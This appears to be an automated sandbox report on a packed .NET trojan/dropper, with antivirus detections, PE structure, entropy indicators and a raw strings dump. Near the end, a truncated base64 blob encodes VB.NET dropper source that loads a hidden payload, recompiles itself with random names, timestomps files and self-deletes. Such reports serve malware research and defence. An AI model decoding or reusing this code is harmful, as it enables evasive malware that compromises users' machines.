1.1
低危
DACN
0.12
FACILE
1.00
IMCLNet
0.93
MFGraph
0.00
反病毒引擎
| 查杀引擎 | 查杀结果 | 查杀时间 | 查杀版本 |
|---|---|---|---|
| Alibaba | Trojan:Win32/csharp.ali2000008 | 20190527 | 0.3.0.5 |
| Avast | Win32:Agent-AVLJ [Trj] | 20240215 | 23.9.8494.0 |
| Baidu | None | 20190318 | 1.0.0.2 |
| CrowdStrike | win/malicious_confidence_100% (W) | 20231026 | 1.0 |
| Kingsoft | malware.kb.c.1000 | 20230906 | None |
| McAfee | GenericRXCZ-AI!EC43C715630E | 20240215 | 6.0.6.653 |
| Tencent | Trojan.MSIL.Zilla.ha | 20240215 | 1.0.0.1 |
静态指标
动态指标
该二进制文件可能包含加密或压缩数据,表明使用了打包工具
(2 个事件)
| section | {'name': '.text', 'virtual_address': '0x00002000', 'virtual_size': '0x00013174', 'size_of_data': '0x00013200', 'entropy': 7.486278065071059} | entropy | 7.486278065071059 | description | 发现高熵的节 | |||||||||
| entropy | 0.9807692307692307 | description | 此PE文件的整体熵值较高 | |||||||||||
网络通信
与未执行 DNS 查询的主机进行通信
(2 个事件)
| host | 114.114.114.114 | |||
| host | 8.8.8.8 | |||
文件已被 VirusTotal 上 58 个反病毒引擎识别为恶意
(50 out of 58 个事件)
| ALYac | Trojan.GenericKDZ.95254 |
| APEX | Malicious |
| AVG | Win32:Agent-AVLJ [Trj] |
| AhnLab-V3 | Trojan/Win32.Mintluks.R344351 |
| Alibaba | Trojan:Win32/csharp.ali2000008 |
| Antiy-AVL | Trojan/Win32.AGeneric |
| Arcabit | Trojan.Generic.D17416 |
| Avast | Win32:Agent-AVLJ [Trj] |
| Avira | TR/Dropper.Gen |
| BitDefender | Trojan.GenericKDZ.95254 |
| BitDefenderTheta | Gen:NN.ZemsilF.36744.em0@a04@xdj |
| Bkav | W32.FamVT.Deb123TTc.Worm |
| CAT-QuickHeal | Trojan.Generic.TRFH959 |
| CrowdStrike | win/malicious_confidence_100% (W) |
| Cylance | unsafe |
| Cynet | Malicious (score: 100) |
| DeepInstinct | MALICIOUS |
| DrWeb | Trojan.DownLoader7.54184 |
| ESET-NOD32 | a variant of MSIL/Kryptik.MSS |
| Elastic | malicious (high confidence) |
| Emsisoft | Trojan.GenericKDZ.95254 (B) |
| F-Secure | Trojan.TR/Dropper.Gen |
| FireEye | Generic.mg.ec43c715630e96c2 |
| Fortinet | MSIL/Kryptik.JJC!tr |
| GData | MSIL.Trojan.PSE.105TIS2 |
| Detected | |
| Ikarus | Trojan.Dropper |
| Jiangmin | TrojanDropper.Injector.ioj |
| K7AntiVirus | Trojan ( 0056ae4d1 ) |
| K7GW | Trojan ( 005690671 ) |
| Kaspersky | HEUR:Trojan.Win32.Generic |
| Kingsoft | malware.kb.c.1000 |
| Lionic | Trojan.Win32.Generic.4!c |
| MAX | malware (ai score=80) |
| Malwarebytes | Generic.Malware.AI.DDS |
| MaxSecure | Trojan.Malware.300983.susgen |
| McAfee | GenericRXCZ-AI!EC43C715630E |
| MicroWorld-eScan | Trojan.GenericKDZ.95254 |
| Microsoft | PWS:MSIL/Mintluks!pz |
| NANO-Antivirus | Trojan.Win32.Generic.euparm |
| Panda | Trj/CI.A |
| Rising | Backdoor.njRAT!1.AE81 (CLASSIC) |
| Sangfor | Suspicious.Win32.Save.a |
| SentinelOne | Static AI - Malicious PE |
| Skyhigh | BehavesLike.Win32.Generic.lc |
| Sophos | Mal/MSIL-TU |
| Symantec | Trojan.Gen.MBT |
| TACHYON | Trojan/W32.DN-Agent.80384.BJ |
| Tencent | Trojan.MSIL.Zilla.ha |
| TrendMicro | TROJ_MINTLUKS.SM |
二进制图像
288x288
224x224
192x192
160x160
128x128
96x96
64x64
32x32
运行截图
暂无运行截图
该样本运行过程中未生成截图
PE Compile Time
2020-05-26 03:12:04
PE Imphash
f34d5f2d4577ed6d9ceec516c1f5a744
Sections
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x00013174 | 0x00013200 | 7.486278065071059 |
| .rsrc | 0x00016000 | 0x000002b0 | 0x00000400 | 2.2262387961457426 |
| .reloc | 0x00018000 | 0x0000000c | 0x00000200 | 0.10191042566270775 |
Resources
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x00016058 | 0x00000254 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
Imports
Library mscoree.dll:
• 0x402000 _CorExeMain
L!This program cannot be run in DOS mode.
`.rsrc
@.reloc
?Xkl(N
?Xkl(N
&-;DNXl5
?Xkl(N
?Xkl(N
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
I%&/m{
iG#)*eVe]f
{{;N'?\fd
! ?~| ?"?
7]~]_?
M:[ltz
hD??k0_
V -|{E
~&\V7ohwt
%_L/]=
.7oR"{
?Oc1]<
6~_s~7m0"f
_W9PCi
[hq@k|2
iol&-Z
oF;QFMz~!}
gxp~!1&>_
co~{{7 ~'4L
2>O~#~
S@?yEB
kH>N`6_a
mTpk}!$
M<!$m?
|9e?uw
21 /~]_uLuyrGN?op|7
$n_}~z~
_1g6C[ 7
%Qk::^
8[*G;AG
puL?+B*I
9Tt1T8ok
v-~Bo!)I
'Vo%aw'
_g~|24V)?
u8> :5
_H^uv>
|o?o?_
3i>1i?-
z9WoFlq
[g75(o H c`F#Q
jqlhq^C
oh=xa_;
0TvB~x~7IJ
Wh~Q J-
~_?k`
_`?]~3}:`(
4ok:4F6S~
01_~+ @m
7w~?_h_>o
ocoEc ~?
JI7A3~'~
2Ck"3hm$h
cOg1I?
~)u#Dxx6 D(
<Q;Hb+
KO:Dyk~
[C+ i.o j7
0YSz0w4
swk7w /-$U
>HT#z%`_k@F
?=:N`B~
ck|D}yF
>-w~-5~GTLo$
?wH~_[A{H~
)}B l$
E_e~Vd
^}/O_z
~__'?G
1]vi6 N'N
?37w}
-_4]}/]
?~?~o!?
_4o 3l
05ls^a:F&
4s5&;NT~
H${o)
5_cU<Q
z2km9N
.}CXa\
o%~__r
m";WbMf
m~#!o)
sd5Fm
oPp ?70d
[6oy@Z
bBq{2i
)A[*Vo[5
T>3~o;_&Nb[
~}O~3T8?ym
8G?&o}9X#!"_-
o6>;O/9u~1
~K?CV?
wD _ s
#nt.~)z
_9}B o'
3tk?-u
?0hE_5RK1
x~YC~$BE
+w*Nw
5~o/(?~
K>3x~n8om$'3
{o 0?o0
o_o_~}mno
~5^im}
~?2/oo?|'
/wOowk
?n-o-w4
k}?=vZ_W[K[%
m[K?Z_
G_+?o/
[!_Oo|Kv
!_|57K
-v]~'|;.
?~{|k-`&
>ooC~!7o
;W#_C~
;W!7oC~
bo.@P
eSvhcvh
@wodvhoo C
C./o\_
o7e*n!
oop|y
_8~>5~m3_5~?
FoKc /+
Z5_k _~_w~W
$|N/kp
5yGk?[%}
^_ho7n
D_m+<W? vM~
~MTK~_vS%okPw
%'ndU
5]vo t;`
:s^8%$
j#b0Uo
OF}A_@3^
ek6-p~_#
' &oh7-
;n8mn_n>C
A~wl$F!mHf[
[&oD~#
>oco,uZ
O~o 6/
Iqoo9l
_C^mX6
ozC' c)
~~ KFwI
Wo_T3a
z?V xu
5/~_~w3{ ~_g.?td_O
SBz7~M7&M
7OL_9u?~u~o6;~]
~="Gvm~?~
w70JCFj
'oH oF
_TAvoBo
g&*~O~[l>}
^>77y\vo
~=_>/}
^(__ApWfJ~
(8% on
oz__~7-
F7O ?._.mywQ
~cwHwc &o~~
*~0CzF7NgI}".iV`Grk
6y&k~# 5m
_f`yd`~
/&s6oo6^
ofWFfi~ko~f
o~odg7
mbfMu~
D?_"__
E'[h?5yc
~?[?G?
[ %Z[N4
!o~k)e~73?
~}$.rJ
%~hw_~uJ!
-<j<~O7~
Z #oa oB
:iC(gw4
>Xs?@R~kcfw$^K 3hB]
_o$lm`.Zs
m_#O54
+'XgZ"^1
'_C<9%k
!tFo[:
_)Ji^','q
kU5>yA,Vf<
k<#,b,
u+W^^mpo
>mko->
v%]~'^x
mh1m<22
4k~_?u
[Sook_zHc
E/o!}[Z
oG/x5uo
7[w D/E
oke_wX0l
[ZmF39=
aV m]o
FV/(]~
(PbO~_o
j^DPK2_Xu~_L~_
~MkwP~=
qB#7q0 O~o
';(o~1u'/B~
6 K9yd{
`wb~_s0}
|L$7_{>F6_
7L-{6xookI9
o4`2jh}wk)^O
oDD7M~
,_5~/;~k
_okAOJ<;;Z
~?7uy~_
Mh(15~-
L~-Lo
[oo}l<&
7V?Io_
e~)g~=
"O+KoU
S!gc&s.
)@>h~?-m
[7moH?Gz!3]*%
;S k}rJx .Y]Ky
y_??x;k<$O'_*
>q7s~~@IG
+,7`J*G7/zD8~
3koOoS@s{
2>v .#O
~ c2mwp_k@;"|w
Vh~Y3/
}xde5vkg|BZD3no[o
%~go0L'Lw1}
k.1>m2
?wU2Z]
]~'n$w!
|7]>"-
-FfM7rwJo
o~k<}B
l?F?YI_%_
M~RDOGk
w-to~]
~9L~mY#
_WH'o3N,LJOL^
yuHT+p
%o%ro;z
5zmUu$4HozUC~
;v~Kj[]h
/5oFL~%
{j|Hl]
~ ouO'
|rK?v/5_
_yG$I~k
_k`N|}'_
_u~"O c~
lb0o:D|_-
&h!k%oLo+
"_G"_F~
'JzviG`
D)\c`R
:o GJ0
O&7_sW|
5y 6 #_X
__3)k8GAq4
ZD)QI{OQ'~_f`g
M~C7ek
X1_zQ~/^
`",:zm``
#2Bc|gw?}O
p<zl[,5
r@)<u_B7u~~g'B>
kJ:+Y2-QzL
3k7u!y
-~]~:.
O7~_[W~O[%-5Eg I
tOd;G`=
a1Xoc`X5Zc)]
.n"gXCF~)~W
%?Ix]^#x/4$P/
"_M>M?-4v
0~)~e9T|
?\j_D`[
=~w=e~_5~BX
kN-L_eO7
K7YD~^
^[e[@_H
Z5~?@]\
#36A/=y'
u~}Ojc
05_ __
_cN~?~_
/]~_W.&[xa
_ K~w}A+:
3ok z_m
W?~W>B
g~G##?M~-~ _
x/o_ $~>
~ol5?vk
Iok?%I~
';C.>e|k
m~?okY/5
M85Pc_+?^g
kBh'%o
_s?c_/
}|1{?;
c?c3/
cC~3P/
??#?o1=
=~{|~=_75
_o-?#w
57|;[d~
%z_OAk$
aeJ~-w
~_w2&Kk}
e6Y_7]
m~?m#_
_&-Bk_
dJ?v ..zP
7okMqv
/5*&wO~k_IkJ
?_~_ H~_w5?
YPoo?'
k5~Lm~<5
<507U/~5
QoKo7_
wG7/~:5Voku
?~_ork=5
qO_OIM~_
?ky2m~o_
.~zkZ_?
{oskcoY? _
}~7;5kk
M_f__7C
oZ_kec
3~?oOZ
okm~VW
6?k___
o~k~_k
/_S.~o~
J:_5~Bz
{P_kk[
{og:uoW:.{
w{uv_S_
?07/h7o
/?65~kw>9_z?zMMo7
]__k?c]=8c
r_A mr
_/_E#W8musw
dokgyH-_!RJ
@+/5_?
~_WW[cRGc'$<
_'6G;?
F~rj GO@?
1__oWZcw
'~B?Yn/.
~_k9/Z_1~H-5_Kf
?kgHOZ
x_g>G~_
O+ ok ;@l~}~8}~
~oOA[K~?u
IGs -_
vk/dk s?
~rH|}o%
{vcF/~_/
M~ u7|kW#/
o~a9/3
?r3AF~{T
_ H/~?/_F
1{t_u~oI
?.`%wAog
7~H:Wo_~M_I~
v_wok_
oc>o~_w
~?wwugu
ogZ k{
K7{1|~
fl"?O_/' =_k?~__
_fw~
?<_~H~? ????$
kZfkyok
16_kDcF
co@ 5~_7
"/! 9_?OS>
a{[_M2O_?_~
75_7.O~
0Ou_u_
??co/cn
o&o;}7G
ozQ_F{ooN'c
Yof?A_#v/fofo)J5~_;k;[
_?H75#
i_>O_ G
>o<M^&'kW
?Z_7-~-J%
_kgk!sk_k
5 kk<5_
g-~_k_/5A
o}K~~k
C% '?N
[O(!=o
fZe15(uT'fO
_\ Ve1
Z_jZyM
yV/evAi0
.7<kT~
_U^gj?oOu
h~Y=+2j=
mNyq$:b
"{k<}z9
}ky}zr_/
7vlSybIs
YUM5P$0
I5/_qs
z3Oj\b(2{c
[Vw :_451K~k45o
zk|WO</z v
:)Tb<+I.
Qq _cb
syg|..~`yt9?ksQ,rf3B
3$&Df~?9~|1
?NO_+z
S^O^w8}z&''
/_w# :~c_
?i~}}S
6IG^d/O=g01Q^
Z'WY*Kc
@Ok<-x-
4+:[6bEm4w:XE5V
NC[1YU
vh~ov>
rsx^]V+4
kaI%a@i^
55t8'qhtR&^
:?7V\h
5b~5Lf?Y_
.X8s_ \z]
UqvQ=!
|_W;O=?WO
%;}kLm7o
zk} \ZEu_k
dtZAs{'x
oZA-C_%XeE
Hf@i_aAv
/{D~8~kB*t\
0"hEnX
^FG6.
+E m]]K_c]
l%Q ,25 _B=
/)_J>c
TR&1!Bc{Z
1S+%t:
:vDn )
%LV9Z$
Ou~E?jy-?~
kbO{:G
4/(/|?h>
Mh&EgO^
Xv>+pf
e^fu ~6)I
P|s^,5
G/^g&x6s
S}5V$d%9dV5V
d0y+`B&;;K]hm%we+
&w|;EUV~*l
}z=]}44u~
'F*\,X
75shP@
@I&k>D
v"^- `d7
b?0<X-
QM~Z~aF~
M/^ 'D9
7g/}7g_5~WO
/O_{yzR\
m'|y9T'
$~mZyk
dEtw)R
)5{WO.NY._
ZIE*sZu+=dd
Pn@}[J
nRLPevu
%-WG,2|4
}D$Q_eWF
^~cx~~
IF)OLHz~9}qL/|I"
}kha],
aUk-fJ2
0%:F up\&
ycd!#:$OJX
N5l]~>m*
15"x;c
9cYYO_}S*q</*_
cPf&/[
/ 2C/wq "
$B~C/7
}C%)BJ>En
5~dhX&t^W;\3vAcdiH
LzZQ07
pG%kp78
GXW9dO
}t ^4 =FN~F>c
QV8_a
95$;#[/!^;
PYHfuC/g/H89eJ [9I}$a'\j
2[ffIP?
*0f%^!L"NF.D
Z~"F^M
kaon&N
/;\B.dH
W0BF/ne
\I+~LD
%yNVG}KJFK
y&z,jD
!*R *
|_LzSg
~oBqyA/~
X!aEa:Qd}]h
sYaU=BbkF
9^E'O'
fG<~}rv
K-1I/D
w[)Z!-=11/
(OiVm?'4-
&M@_~E~k|E
ej"z_
3Hvs014
%q>[J5 )
?Q{]bo$5O)/
J|Yfo*;
&_/k\54\fF
.ivd<^M_I< o
Y#:1$ZjqVI<bLfAI2
F</_?[}/
9bku1O
(+O"qN_8}N/>t6V
$TK Co
^_=%E0s}I
/$py2{
qkd35fk
1~+6#X{
_~qN]N+
p|I}I#zk<~NcxC?_qB
1_7}J?_
Q {m>
?95~5~o7?IOi-x7~Cm)0
}]0:57~
f> ;W4L#o
KO~g4Oi
)}i;f5~|
(A_7~A"
-_og_If
s[x~R?%}C
WB_%A5~cs?79|
{3)IpR9A;#h
|V9;&n>^2%!Qo
>g[:ZwI~
ux<CvN@_
.~_wuJ
wIO'[o
9t6?~4X_h96!F
_?ck>O
X=g?o ?~R/
i~_#5GO~
~5~m2VvF?')t
5FO[Od'
k5$W'k!
w4"_7=!o4m
V u1KqL
eAP0!Nt
~[hYHIS
k|zo_g0
="Oonn'ou|3
olKIV>Me
_])3M%q;w5~r9Psb`k
toN"9s?x
a|Na^9~/
tX3^%#s7{
."k| z
H7.mKV8
svJQ(Oh
P]qcj2
CGc;gQ+q
P<>}}jTD
e>!?x1`d
2--nrp
k<|JekJIB^3O]>ZG7o
Y6<fKw9O~{
KbxU}XG|O
EFZA4 [[d&
R>&52io
Fse~8<;]
>~}p7oh3~7[>qC
L+}MC>1W@
P{x{fL?
vz`F*~
~RT%80
DN&]-^X_wD
a^>yZg
Pv6K@p
G>lG4@!+3O
qIYY<)t*
?rtxKp
<$KeB
E}kVx{0
_-d&6GR ]
o[(>&p.
w'XOS<%(& #ikx4er>%%
YCx!'q]
c()I\A
k23AJ0K_
}MkD?~
?qg?c 5~
~375~w-~
kZoB?~7I
|C51c)u'
7*7hQ%
ko@ D'f
tCokzo
E~3z'~C
|x@~_`
/o[Ao[
%-~_/eF
A'D7[:}c(XjFkz?
~?_u~}c+oH
;(.ZUjRC
~5~/'bns2
_7?WfmQ-g'
2}F9u Ik
Ve3~]eo,ek>-N
;&!T"3!ToB
W_wM`#
BWM~'2d_
?/u~}s
;IoG?HKv
Tva~M66O
00o!&HL
%v~&_<
_A,5~_
I Z oB
)/7:#k
}kZD_4
U9aF_Q@O4_N
y.O? _
~-~7$B'A;%
up@~6`
~C6">o
@8tml>iV
#MOb?uX
c7~'!A
E8WECx
foD+u&
yV<_?5`b
d)(C{W?
?$%8+
jynxUk
OSgI{~>}
;?zoFv
r?e$,5c5R
Or,a#-,T#
fNy&`1}H
&5ctk o+<f_._qhc9w;
nSW1wb3J0cyBTeXN0ZW0uSU8NCkltcG9ydHMgU3lzdGVtLklPLkNvbXByZXNzaW9uDQpJbXBvcnRzIFN5c3RlbQ0KSW1wb3J0cyBTeXN0ZW0uVGV4dA0KSW1wb3J0cyBTeXN0ZW0uRGlhZ25vc3RpY3MNCkltcG9ydHMgU3lzdGVtLkNvZGVEb20uQ29tcGlsZXINCkltcG9ydHMgU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcw0KSW1wb3J0cyBNaWNyb3NvZnQuVmlzdWFsQmFzaWMNCg0KUHVibGljIE1vZHVsZSBiQUZ3dm5PTEZqDQoNCidBUEkxDQoNCiAgICBQdWJsaWMgU3ViIE1haW4oQnlWYWwgYXJncygpIEFzIFN0cmluZykNCg0KICAgICAgICBJZiBOb3QgYXJncy5MZW5ndGggPiAwIFRoZW4NCiAgICAgICAgICAgIEF2TnhJQ1JYVUEuTGZEWVdEcmtHVygpDQogICAgICAgIEVsc2UNCiAgICAgICAgICAgIFRyeSA6IEZpbGUuRGVsZXRlKGFyZ3MoMCkpIDogQ2F0Y2ggOiBFbmQgVHJ5DQogICAgICAgIEVuZCBJZg0KDQogICAgICAgIERpbSByZXNtIEFzIE5ldyBTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlTWFuYWdlcigiekNvbSIsIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkdldEV4ZWN1dGluZ0Fzc2VtYmx5KQ0KICAgICAgICBEaW0gRGF0YVggQXMgQnl0ZSgpID0gRGVmbGF0ZV9EKHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkxvYWQoRGF0YVgpLkVudHJ5UG9pbnQuSW52b2tlKE5vdGhpbmcsIE5vdGhpbmcpDQoNCiAgICBFbmQgU3ViDQoNCiAgICBQdWJsaWMgRnVuY3Rpb24gRGVmbGF0ZV9EKEJ5VmFsIERhdGFaKCkgQXMgQnl0ZSkgQXMgQnl0ZSgpDQogICAgICAgIFRyeSA6IFJldHVybiBnZXRTdHJlYW1CeXRlc1goTmV3IERlZmxhdGVTdHJlYW0oTmV3IE1lbW9yeVN0cmVhbShEYXRhWiksIENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzLCBUcnVlKSwgRGF0YVouTGVuZ3RoKQ0KICAgICAgICBDYXRjaCA6IFJldHVybiBOb3RoaW5nIDogRW5kIFRyeQ0KICAgIEVuZCBGdW5jdGlvbg0KDQogICAgUHVibGljIEZ1bmN0aW9uIGdldFN0cmVhbUJ5dGVzWChCeVZhbCBkYXRhU3RyIEFzIFN0cmVhbSwgQnlWYWwgZGF0YUNodW5rcyBBcyBJbnRlZ2VyKSBBcyBCeXRlKCkNCiAgICAgICAgRGltIGRhdGEoKSBBcyBCeXRlIDogRGltIHRvdGFsQnl0ZXNSZWFkIEFzIEludDMyID0gMA0KICAgICAgICBUcnkgOiBXaGlsZSBUcnVlDQogICAgICAgICAgICAgICAgUmVEaW0gUHJlc2VydmUgZGF0YSh0b3RhbEJ5dGVzUmVhZCArIGRhdGFDaHVua3MpDQogICAgICAgICAgICAgICAgRGltIGJ5dGVzUmVhZCBBcyBJbnQzMiA9IGRhdGFTdHIuUmVhZChkYXRhLCB0b3RhbEJ5dGVzUmVhZCwgZGF0YUNodW5rcykNCiAgICAgICAgICAgICAgICBJZiBieXRlc1JlYWQgPSAwIFRoZW4gRXhpdCBXaGlsZQ0KICAgICAgICAgICAgICAgIHRvdGFsQnl0ZXNSZWFkICs9IGJ5dGVzUmVhZA0KICAgICAgICAgICAgRW5kIFdoaWxlDQogICAgICAgICAgICBSZURpbSBQcmVzZXJ2ZSBkYXRhKHRvdGFsQnl0ZXNSZWFkIC0gMSkNCiAgICAgICAgICAgIFJldHVybiBkYXRhDQogICAgICAgIENhdGNoIDogUmV0dXJuIE5vdGhpbmcgOiBFbmQgVHJ5DQogICAgRW5kIEZ1bmN0aW9uDQoNCidBUEkyDQoNCkVuZCBNb2R1bGUNCg0KDQpQdWJsaWMgTW9kdWxlIEF2TnhJQ1JYVUENCg0KICAgIFB1YmxpYyBTdWIgTGZEWVdEcmtHVygpDQogICAgICAgIERlbE1lKCkNCiAgICAgICAgRGltIE15UGF0aCBBcyBTdHJpbmcgPSBQcm9jZXNzLkdldEN1cnJlbnRQcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUNCg0KICAgICAgICBEaW0gcmVzbSBBcyBOZXcgU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZU1hbmFnZXIoInpDb20iLCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseS5HZXRFeGVjdXRpbmdBc3NlbWJseSkNCiAgICAgICAgRGltIHNyYyBBcyBTdHJpbmcgPSBGcm9tQmFzZShyZXNtLkdldE9iamVjdCgic3JjIikpDQogICAgICAgIERpbSB6Q29tIEFzIEJ5dGUoKSA9IERlZmxhdGVfRChyZXNtLkdldE9iamVjdCgiZmlsZSIpKQ0KICAgICAgICBVc2luZyB3cml0ZXIgQXMgTmV3IFJlc291cmNlcy5SZXNvdXJjZVdyaXRlcigiekNvbS5yZXNvdXJjZXMiKQ0KICAgICAgICAgICAgd3JpdGVyLkFkZFJlc291cmNlKCJzcmMiLCBUb0Jhc2Uoc3JjKSkNCiAgICAgICAgICAgIHdyaXRlci5BZGRSZXNvdXJjZSgiZmlsZSIsIHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgICAgICB3cml0ZXIuR2VuZXJhdGUoKQ0KICAgICAgICAgICAgd3JpdGVyLkNsb3NlKCkNCiAgICAgICAgRW5kIFVzaW5nDQoNCiAgICAgICAgRGltIHRlbXBuYW1lIEFzIFN0cmluZyA9IFN5c3RlbS5JTy5QYXRoLkdldFRlbXBGaWxlTmFtZSAmICIuZXhlIg0KDQogICAgICAgICAgICAgICAgRGltIFZhcnMgQXMgU3RyaW5nKCkgPSB7IkF2TnhJQ1JYVUEiLCAiYU5DSGl0RUJjRSIsICJiQUZ3dm5PTEZqIiwgIlVObERVY3dhYXAiLCAiZ01MTVRLSnVwZCIsICJ0UkxTeHJ5bWVpIiwgInhZcWZ3RmdTQXMiLCAiWmFWcVdxc3liYyIsICJMZkRZV0Rya0dXIn0NCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gVmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZShWYXJzKGkpLCBBKDE1KSkNCiAgICAgICAgTmV4dA0KCQlEaW0gUiBhcyBOZXcgUmFuZG9tDQoJCURpbSBYIEFzIEludGVnZXIgPSBSLk5leHQoMSwgIzEwMCMpDQoJCURpbSBqIEFzIE5ldyBVTmxEVWN3YWFwKDEsIFgpIDogUmFuZG9taXplKCkNCiAgICAgICAgU3JjID0gU3JjLlJlcGxhY2UoU3RyUmV2ZXJzZSgiMUlQQSciKSwgai5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajEgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIySVBBJyIpLCBqMS5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajIgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIzSVBBJyIpLCBqMi5nTUxNVEtKdXBkKSA6IFJhbmRvbWl6ZSgpDQoJCQ0KCQlTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIjMDAxIyIpLCBYKQ0KDQogICAgICAgIGFOQ0hpdEVCY0UuWmFWcVdxc3liYyh0ZW1wbmFtZSwgc3JjLCBUcnVlKQ0KDQogICAgICAgIERlbE1lKCkNCg0KICAgICAgICBEaW0gRGF0dW0gQXMgTmV3IERhdGUoMjAwMCArIHIuTmV4dCg3LCAxMSksIHIuTmV4dCgxLCAxMCksIHIuTmV4dCgxLCAzMCkpDQogICAgICAgIEZpbGUuU2V0Q3JlYXRpb25UaW1lKHRlbXBuYW1lLCBEYXR1bSkNCiAgICAgICAgRmlsZS5TZXRMYXN0QWNjZXNzVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQogICAgICAgIEZpbGUuU2V0TGFzdFdyaXRlVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQoNCiAgICAgICAgRGltIHN0YXJ0SW5mbyBBcyBOZXcgUHJvY2Vzc1N0YXJ0SW5mbw0KICAgICAgICBzdGFydEluZm8uV2luZG93U3R5bGUgPSBQcm9jZXNzV2luZG93U3R5bGUuSGlkZGVuDQogICAgICAgIHN0YXJ0SW5mby5GaWxlTmFtZSA9IHRlbXBuYW1lDQogICAgICAgIHN0YXJ0SW5mby5Bcmd1bWVudHMgPSBNeVBhdGgNCiAgICAgICAgUHJvY2Vzcy5TdGFydChzdGFydEluZm8pDQogICAgICAgIFByb2Nlc3MuR2V0Q3VycmVudFByb2Nlc3MuS2lsbCgpDQoNCg0KICAgIEVuZCBTdWINCg0KCSdBUEkzDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBBKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gInF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk0iLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQogICAgUHVibGljIEZ1bmN0aW9uIEFCKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gIjEyMzQ1Njc4OTAiLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQoNCiAgICBGdW5jdGlvbiBUb0Jhc2UoQnlWYWwgU3RyIEFzIFN0cmluZykgQXMgU3RyaW5nDQogICAgICAgIFJldHVybiBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKEVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoU3RyKSkNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBGdW5jdGlvbiBGcm9tQmFzZShCeVZhbCBTdHIgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgUmV0dXJuIEVuY29kaW5nLkRlZmF1bHQuR2V0U3RyaW5nKENvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhTdHIpKQ0KICAgIEVuZCBGdW5jdGlvbg0KDQoNCiAgICBTdWIgRGVsTWUoKQ0KICAgICAgICBUcnkgOiBJTy5GaWxlLkRlbGV0ZSgiekNvbS5yZXNvdXJjZXMiKSA6IENhdGNoIDogRW5kIFRyeQ0KICAgIEVuZCBTdWINCg0KRW5kIE1vZHVsZQ0KDQpQdWJsaWMgQ2xhc3MgYU5DSGl0RUJjRQ0KDQogICAgUHVibGljIFNoYXJlZCBTdWIgWmFWcVdxc3liYyhCeVZhbCBPdXRwdXQgQXMgU3RyaW5nLCBCeVZhbCBTb3VyY2UgQXMgU3RyaW5nLCBCeVZhbCByZXMgQXMgQm9vbGVhbikNCiAgICAgICAgT24gRXJyb3IgUmVzdW1lIE5leHQNCg0KICAgICAgICBEaW0gQ29tcGlsZXIgQXMgSUNvZGVDb21waWxlciA9IChOZXcgVkJDb2RlUHJvdmlkZXIpLkNyZWF0ZUNvbXBpbGVyKCkNCiAgICAgICAgRGltIFBhcmFtZXRlcnMgQXMgTmV3IENvbXBpbGVyUGFyYW1ldGVycygpDQogICAgICAgIERpbSBjUmVzdWx0cyBBcyBDb21waWxlclJl